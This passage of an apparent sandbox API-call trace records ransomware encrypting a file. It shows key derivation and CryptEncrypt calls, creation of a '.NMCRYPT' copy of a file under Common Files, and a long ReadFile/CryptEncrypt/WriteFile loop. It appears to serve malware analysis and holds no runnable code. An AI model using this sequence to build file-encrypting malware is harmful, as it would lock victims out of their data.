hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.278] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0149.279] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0149.279] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0149.279] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0149.279] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad3b8) returned 1 [0149.279] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0149.279] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0149.279] wcslen (_String="\\\\?\\") returned 0x4 [0149.279] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7f8) returned 1 [0149.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0149.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0149.280] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=84190) returned 1 [0149.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0149.280] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.302] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.302] GetLastError () returned 0x0 [0149.302] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.364] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.364] GetLastError () returned 0x0 [0149.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.364] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.364] GetLastError () returned 0x0 [0149.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.364] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.364] GetLastError () returned 0x0 [0149.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.364] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.364] GetLastError () returned 0x0 [0149.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.364] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.364] GetLastError () returned 0x0 [0149.364] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.364] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.365] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.365] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.365] GetLastError () returned 0x0 [0149.365] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.366] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.366] GetLastError () returned 0x0 [0149.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.366] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.366] GetLastError () returned 0x0 [0149.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.366] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.366] GetLastError () returned 0x0 [0149.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.366] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.366] GetLastError () returned 0x0 [0149.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.366] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.366] GetLastError () returned 0x0 [0149.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.366] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.366] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.366] GetLastError () returned 0x0 [0149.366] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.367] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.367] GetLastError () returned 0x0 [0149.367] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.367] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.367] GetLastError () returned 0x0 [0149.367] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.367] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.367] GetLastError () returned 0x0 [0149.367] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.367] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.367] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.367] GetLastError () returned 0x0 [0149.367] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 